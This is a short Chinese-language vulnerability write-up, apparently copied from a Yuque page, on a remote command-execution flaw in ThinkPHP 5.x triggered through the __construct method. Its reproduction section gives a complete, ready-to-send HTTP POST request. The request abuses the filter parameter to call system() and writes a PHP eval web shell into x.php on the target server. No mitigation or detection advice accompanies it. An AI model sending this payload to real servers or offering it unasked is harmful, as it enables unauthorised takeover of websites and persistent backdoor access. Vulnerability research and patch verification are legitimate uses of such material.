登录 白背景

thinkphp 5.x版本construct存在命令执行漏洞

一、漏洞简介

<font style="color:rgba(0, 0, 0, 0.84);">ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。thinkphp 5.x版本construct存在命令执行漏洞</font>

<font style="color:rgba(0, 0, 0, 0.84);">二、影响版本</font>

  • ThinkPHP 5.x

三、资产测绘

  • 特征

1729963808032-4c0b07bd-8822-4e62-b42e-1f5cc02152fd.png

四、漏洞复现

POST /?s=index HTTP/1.1
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
User-Agent: Java/1.8.0_291
Content-Length: 92

_method=__construct&filter[]=system&mytest=echo '<?php @eval($_POST['x'])?>' >>x.php

1729966843930-9aeba990-da99-41b1-9d9f-72f32dc51872.png

1729966836824-3bcc14f4-3fc5-4cd6-b8af-23f97307c1c5.png

原文: https://www.yuque.com/xiaokp7/ocvun2/we68qvznge5g1g88